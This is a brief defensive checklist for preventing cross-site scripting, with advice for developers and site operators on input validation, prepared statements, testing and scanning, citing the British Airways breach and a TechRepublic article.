Cross-site scripting attacks
How-To: Prevent the XSS attack-vector leverage
Additional steps from Development to Deployment
**Developers**
- Should determine what is a safe user input and reject all others - be it a text, javascript or any unauthorized piece of code- Depending on the Input text box, developers can restrict text to certain characters (avoid ones causing troubles) and also limit the maximum number of characters
- should write a code which checks that improperly formatted data are never inserted directly into the HTML content, that might compromise the whole web application
- should implement prepared statements (known to be reliable) for any database queries as well as the input validation described above
**Website operators **
- should carefully choose third-party web app providers to ensure their products have the right security measures in place- should test the web apps to ensure that they are not vulnerable to attacks involving cross-site scripting or SQL injections
- should continuously scan their sites in real-time to detect any unauthorized code. This should involve not only automated website vulnerability scanners (i.e.: Nikto, OVASP)
- you have to be proactive == > hire an experienced professionals ( White or Grey ) who can assess web app security against attacks like these with a custom approach
========================================================================
The last step is important !
Anything less than a pro-active, comprehensive approach to securing the sites will grow to infringement of a great number of consumer's data privacy due to regulations like GDPR.
As a good example of a DO's & DON'Ts we might mention the recent attack on "The British Airways". But you can practically choose any of the large attacks during the past 5 years.
========================================================================
::Remember::
Just because a website is secure that necessarily doesn't mean that a web application is secure as well
source: TechRepublic
( https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions )
